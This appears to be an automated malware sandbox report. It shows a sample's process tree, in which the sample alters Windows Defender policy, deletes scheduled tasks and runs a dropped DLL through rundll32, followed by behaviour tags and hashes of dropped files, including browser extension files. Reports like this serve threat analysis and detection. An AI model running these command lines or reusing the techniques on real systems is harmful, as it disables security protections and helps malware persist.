C:\Windows\SysWOW64\reg.exeREG DELETE "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet" /v "SpyNetReporting" /f /reg:643⤵PID:4244
-
-
-
C:\Windows\SysWOW64\schtasks.exeschtasks /DELETE /F /TN "uaXipkbyxrnNFDdtl"2⤵PID:3560
-
-
C:\Windows\system32\rundll32.EXEC:\Windows\system32\rundll32.EXE "C:\Windows\Temp\WVcQpKJMvymSgqJu\LRILxDNM\qVSacXy.dll",#1 /nOsite_idqBf 3851181⤵PID:2832
-
C:\Windows\SysWOW64\rundll32.exeC:\Windows\system32\rundll32.EXE "C:\Windows\Temp\WVcQpKJMvymSgqJu\LRILxDNM\qVSacXy.dll",#1 /nOsite_idqBf 3851182⤵
- Blocklisted process makes network request
- Checks BIOS information in registry
- Loads dropped DLL
- Enumerates system info in registry
- Modifies data under HKEY_USERS
PID:4452 -
C:\Windows\SysWOW64\schtasks.exeschtasks /DELETE /F /TN "xOSrYfgHudgkQpnQd"3⤵PID:3812
-
-
Network
MITRE ATT&CK Enterprise v15
Replay Monitor
Loading Replay Monitor...
Downloads
-
Filesize
2KB
MD56d93bab81013978f3de84bf5b330a3cc
SHA19ef480837975672c708d5986c11ec6fb0f086c1c
SHA256b698954547ef7bdc9677d65466a5dce616a057abdb20810dc6e6c8535bb73346
SHA5123ac628fd48587cdf04128140fee9a5b5aa63dbd5d0cc60dc826578d77f04c5b9b8f69970b7f38e77a15f7515a9c1e793ade8f738e149d0782435220bba1af6a6
-
Filesize
2KB
MD5bb6809a95f4adb2ac977aa037c156f52
SHA1a2f6122e8e09367900d105a0da7506525d5dff35
SHA256d102d08bc5703e407e4c915ada43c32994b5d140ce9476f21586752257d05b3b
SHA5120746b77d3c6e7dbe735f392f4833a4a3f1a021c8d7e4c137cffddac35c846d2fd8f17412553006b846e4a00402e6c4903f447634c002884732bbdcee3fd8e7d1
-
Filesize
2KB
MD5d9c9cc917619c408c5f261be05fc8c7d
SHA12575d2178982e4fe75f0f9790752a7e3c9462f3f
SHA256d7e28e3d500a8fae066f2bb300bc949a1f30753cd7e78b4f699dc814a4b3d107
SHA512f09064750e7f9afb2ea5c9f436fdbe71fa142db266da85e7296aa7143378306c4aae7e9b5819e44e1f48b18d965d3e4519e7de0b9a846a885e933c2329610895
-
Filesize
2KB
MD58d520a853fdff8083cf164b49b592a3b
SHA13f117042fe179342d5700a9cd3e0a733bb1e0059
SHA2560f156232eeb078a7af67a098c80cb146f03bd299cbdd1fa39ac07c4ce649c3c3
SHA5123260ac78cbc336c1b97cb183c2edec057802b05f0864ad3cfebe1cbe5ef4a9df340c749b0262ca49201dba4e5101815454fc65c25d45be83802e86349a591fec
-
Filesize
1.1MB
MD59b31ec75bd29c6c9c214f9477488aafe
SHA1048b2cf723399d55674ef276540ff33c3ce51d6d
SHA2569d6e589cbce5197e734a5bded6c440353032d7ca13d2a8687777d766d178e5d4
SHA512ba80b911245516a8c7a96df88f2bdbf7244eb02ede58dd50567d7387906c7d4a85fd26ab574795c8bd44bb288151c92ae0e804a2c01f0b1145fe9bd7a224333a
-
Filesize
2KB
MD5c37fffdd9c66fdf9224f3c9d2c990fcf
SHA1e1cc5fd4d9fde43b1981f2266ef2175d346d886d
SHA25694915523553ac74eea298e033c5a1b4755e5e9dc9adbc750ba3b3f0973efe84c
SHA512e69bf5081742897cda47e36cf6ca3591c4757c2f823ef16e5c1a6dd62f8c9c607eaf7014a81be1cbcfd25f02bdb420835b34094b1c91e7096fd5352a0a7e59ab
-
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Extensions\agcghmjnenlfcjmnldooeaadankclolo\1.4_0\_locales\en_GB\messages.json
Filesize187B
MD52a1e12a4811892d95962998e184399d8
SHA155b0ae8a7b5a5d6094827ede8e6a1d26d4b4a720
SHA25632b4406692c26b540fea815a9bb56df1f164140cd849e8025930b7425036cceb
SHA512bb54d5e8684a6bfeac559b7c7a7551eed6a8a43a4c6464218cb0adb1c89fea124b69760690c3124af86fa68ac3fdbe903eaa098f0af2b6a58f4702c803abc089
-
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Extensions\agcghmjnenlfcjmnldooeaadankclolo\1.4_0\_locales\fa\messages.json
Filesize136B
MD5238d2612f510ea51d0d3eaa09e7136b1
SHA10953540c6c2fd928dd03b38c43f6e8541e1a0328
SHA256801162df89a8ad2b1a51de75e86eba3958b12960660960a5ffafe9bc55bc293e
SHA5122630dd7a3c17dc963b1a71d81295cf22f8b3838748b55c433318e1e22f5b143a6d374ca2e5a8420659fa130200fbaa4814d0f093b1eca244b5635a3b99878e1c
-
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Extensions\agcghmjnenlfcjmnldooeaadankclolo\1.4_0\_locales\pt_BR\messages.json
Filesize150B
MD50b1cf3deab325f8987f2ee31c6afc8ea
SHA16a51537cef82143d3d768759b21598542d683904
SHA2560ec437af3f59fef30355cf803966a2b9a0cd9323d390297496f750775995a6bf
SHA5125bc1f5a2d38f4a071513e2ac25b241c8e5584bed8d77e7fc4194855898d51a328dd73200f5aae6c9bc1b2a304e40e56bc686192074bd8a1bcc98f4971dee428f
-
Filesize
10KB
MD596b58ce6e326811cb540461555666598
SHA1a9fd3c805df75a8a6a5601a688c82d51bc39e0ed
SHA2565cde684c3d3000ccc156b670e6f515c478ac44ed2ec775ea2fb25a4087e27c73
SHA5122010189f396f455ce90806a289df85c296524479727e22fdacddae914cc97c111d3f2b09264a5d21a652181b7c7580b0dd2ba0c11ef6c538c51e3ba24d257ee2
-
Filesize
27KB
MD5db586bb34298985c73abcedd651bd0ed
SHA1116f4c849f6d4027cb5d3f0a7a2ad5693c149056
SHA25667b24f7932b93bc5469d3259d4720e6c654f69e76011335cf4861f1e85e41da4
SHA512c9a241eb741c08569870fb3b74a3f4a73ff32023eeac6335424d82b7908df28affb8f7691c96c26f735f128b8c0871f1675647d95be81e8cefd7abb9a02bbaa7
-
Filesize
2KB
MD56cf293cb4d80be23433eecf74ddb5503
SHA124fe4752df102c2ef492954d6b046cb5512ad408
SHA256b1f292b6199aa29c7fafbca007e5f9e3f68edcbbca1965bc828cc92dc0f18bb8
SHA5120f91e2da0da8794b9797c7b50eb5dfd27bde4546ceb6902a776664ce887dd6f12a0dd8773d612ccc76dfd029cd280778a0f0ae17ce679b3d2ffd968dd7e94a00
-
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Extensions\geiolieogaichbpfhcannipendgnnbkn\1.0.1_0\_locales\es\messages.json
Filesize151B
MD5bd6b60b18aee6aaeb83b35c68fb48d88
SHA19b977a5fbf606d1104894e025e51ac28b56137c3
SHA256b7b119625387857b257dd3f4b20238cdbe6c25808a427f0110bcb0bf86729e55
SHA5123500b42b17142cd222bc4aa55bf32d719dbd5715ff8d0924f1d75aec4bc6aa8e9ca8435f0b831c73a65cc1593552b9037489294fbf677ba4e1cec1173853e45b
-
Filesize
9KB
MD53292d175566fc7150ee57a8fbd0febba
SHA1a6294809eef07435090c8cb1a6994a125f236d7d
SHA25650171cc001710257c6575700424091d94fac5f7793509303f7ea38004aa65369
SHA5128cd1280a7d353b1e5267a6e8e43ff1be100723422ad70159d991ec192e87b11fbd65c71f725342b43511c499ddccb42cc79d9842e2fc5414226134b9477ef95c
-
Filesize
64B
MD550a8221b93fbd2628ac460dd408a9fc1
SHA17e99fe16a9b14079b6f0316c37cc473e1f83a7e6
SHA25646e488628e5348c9c4dfcdeed5a91747eae3b3aa49ae1b94d37173b6609efa0e
SHA51227dda53e7edcc1a12c61234e850fe73bf3923f5c3c19826b67f2faf9e0a14ba6658001a9d6a56a7036409feb9238dd452406e88e318919127b4a06c64dba86f0
-
Filesize
6.0MB
MD52e79acb383c2c2229e5c3524fe05d8c3
SHA1bd4b3f3297c09c81cf5efc5fab5a585743a9610b
SHA25696ae61e40e26b612456eca3433443e2b58467323d7a7db813e089ff7173358f0
SHA512b33e91e09adb5c958194110012072531c1a656ce2d5b87d220db6c86401387b5fe185fbbdc6407078ca5c35c98c40f51cd88ee28e38fa38390add38b0fa79a0a
-
Filesize
6.0MB
MD52e79acb383c2c2229e5c3524fe05d8c3
SHA1bd4b3f3297c09c81cf5efc5fab5a585743a9610b
SHA25696ae61e40e26b612456eca3433443e2b58467323d7a7db813e089ff7173358f0
SHA512b33e91e09adb5c958194110012072531c1a656ce2d5b87d220db6c86401387b5fe185fbbdc6407078ca5c35c98c40f51cd88ee28e38fa38390add38b0fa79a0a
-
Filesize
6.9MB
MD517c68446e3c119dbf373637b818a4ea5
SHA1d13d5956df24adfaa3759ab5f1386135e0ad0667
SHA256dacade72088ef159546fede0de42260fcb46fc931db9addaefcdbe842a55d4fa
SHA512878b84febe24d512af11a31ce2130e5594bf0b891d7baa5dfb4bc947e45ad79cc24aaddac8300502c1bf3077b58fc54b8c728e22070c773e4cc785b858f841de
-
Filesize
6.9MB
MD517c68446e3c119dbf373637b818a4ea5
SHA1d13d5956df24adfaa3759ab5f1386135e0ad0667
SHA256dacade72088ef159546fede0de42260fcb46fc931db9addaefcdbe842a55d4fa
SHA512878b84febe24d512af11a31ce2130e5594bf0b891d7baa5dfb4bc947e45ad79cc24aaddac8300502c1bf3077b58fc54b8c728e22070c773e4cc785b858f841de
-
Filesize
6.9MB
MD517c68446e3c119dbf373637b818a4ea5
SHA1d13d5956df24adfaa3759ab5f1386135e0ad0667
SHA256dacade72088ef159546fede0de42260fcb46fc931db9addaefcdbe842a55d4fa
SHA512878b84febe24d512af11a31ce2130e5594bf0b891d7baa5dfb4bc947e45ad79cc24aaddac8300502c1bf3077b58fc54b8c728e22070c773e4cc785b858f841de
-
Filesize
6.9MB
MD517c68446e3c119dbf373637b818a4ea5
SHA1d13d5956df24adfaa3759ab5f1386135e0ad0667
SHA256dacade72088ef159546fede0de42260fcb46fc931db9addaefcdbe842a55d4fa
SHA512878b84febe24d512af11a31ce2130e5594bf0b891d7baa5dfb4bc947e45ad79cc24aaddac8300502c1bf3077b58fc54b8c728e22070c773e4cc785b858f841de
-
Filesize
60B
MD5d17fe0a3f47be24a6453e9ef58c94641
SHA16ab83620379fc69f80c0242105ddffd7d98d5d9d
SHA25696ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7
SHA5125b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82
-
Filesize
7KB
MD5c4477826deec454653168a815836a356
SHA1f8cc1e90afc9c9c8579e74422cc641474d596394
SHA25626918673a18ab7f02e0083ecf86655f6678e8885ee8357eaa2033e32d8f9fc09
SHA5122a22dcbb09d005bf192433c80d7d527a373997f6df92514706775968a4167adb1c6a9e41e3c3f410a548000e59f93338253954cd7fda7746de03f136b4ead0a7
-
C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\powershell.exe.log
Filesize1KB
MD533b19d75aa77114216dbc23f43b195e3
SHA136a6c3975e619e0c5232aa4f5b7dc1fec9525535
SHA256b23ced31b855e5a39c94afa1f9d55b023b8c40d4dc62143e0539c6916c12c9d2
SHA512676fa2fd34878b75e5899197fe6826bb5604541aa468804bc9835bd3acabed2e6759878a8f1358955413818a51456816e90f149133828575a416c2a74fc7d821
-
C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
Filesize11KB
MD5899171cf4b849f9eaa80d4c806f4fa0f
SHA115a801b9ce43d2417e58c4ddeb1fb21cd69a56bc
SHA2567140f6e627bffb62edae372111f42832591384fa49956eaf87c4dfe7317c6b71
SHA51273235cef20ede2b6751160184246318280dc9f1989a5f97d1a00d88358266fe9d5008f869ef3a1b26fd657fe7b9d028c15bb5da002970d4cd6f6003f34b22e47
-
Filesize
6.1MB
MD5c0b37f5d94dec15fb4a1bad844ead150
SHA15de19a1da2b185a2dd9325c159ae37f9e5e8ebb2
SHA256e24351f00f7755beeabf19d25304bf6fecc8dcc9c0a307091c2f95974e60a056
SHA512803439c6750de5a9e515cef82d412a8bf3e3dac2a043114065b8242461da9bb8a1283cf93ae9889a63ec583217f9723c1b445a84b5a544a183ea59f399f771ed
-
Filesize
6.1MB
MD5c0b37f5d94dec15fb4a1bad844ead150
SHA15de19a1da2b185a2dd9325c159ae37f9e5e8ebb2
SHA256e24351f00f7755beeabf19d25304bf6fecc8dcc9c0a307091c2f95974e60a056
SHA512803439c6750de5a9e515cef82d412a8bf3e3dac2a043114065b8242461da9bb8a1283cf93ae9889a63ec583217f9723c1b445a84b5a544a183ea59f399f771ed
-
Filesize
6.9MB
MD517c68446e3c119dbf373637b818a4ea5
SHA1d13d5956df24adfaa3759ab5f1386135e0ad0667
SHA256dacade72088ef159546fede0de42260fcb46fc931db9addaefcdbe842a55d4fa
SHA512878b84febe24d512af11a31ce2130e5594bf0b891d7baa5dfb4bc947e45ad79cc24aaddac8300502c1bf3077b58fc54b8c728e22070c773e4cc785b858f841de
-
Filesize
6.9MB
MD517c68446e3c119dbf373637b818a4ea5
SHA1d13d5956df24adfaa3759ab5f1386135e0ad0667
SHA256dacade72088ef159546fede0de42260fcb46fc931db9addaefcdbe842a55d4fa
SHA512878b84febe24d512af11a31ce2130e5594bf0b891d7baa5dfb4bc947e45ad79cc24aaddac8300502c1bf3077b58fc54b8c728e22070c773e4cc785b858f841de
-
Filesize
6.9MB
MD517c68446e3c119dbf373637b818a4ea5
SHA1d13d5956df24adfaa3759ab5f1386135e0ad0667
SHA256dacade72088ef159546fede0de42260fcb46fc931db9addaefcdbe842a55d4fa
SHA512878b84febe24d512af11a31ce2130e5594bf0b891d7baa5dfb4bc947e45ad79cc24aaddac8300502c1bf3077b58fc54b8c728e22070c773e4cc785b858f841de
-
Filesize
5KB
MD5918ddae5066d39c7a49281abbc612e6a
SHA16aabd7f13d167f6c80092ce0a54459a7290a5fee
SHA25614b44c516d9e60ddee34403b3c9f6640615f30175588480ae2a68a60f6fcbe92
SHA5122db6b6f34aae3fe3eeff51413578bfc14612bbd91fb993a4037de35cd73b405e671335855ed71ae0961679ecd78e7ce2c9acbdf17ca2710367ff6cdd9568afb5
-
Filesize
268B
MD5a62ce44a33f1c05fc2d340ea0ca118a4
SHA11f03eb4716015528f3de7f7674532c1345b2717d
SHA2569f2cd4acf23d565bc8498c989fccccf59fd207ef8925111dc63e78649735404a
SHA5129d9a4da2df0550afdb7b80be22c6f4ef7da5a52cc2bb4831b8ff6f30f0ee9eac8960f61cdd7cfe0b1b6534a0f9e738f7eb8ea3839d2d92abeb81660de76e7732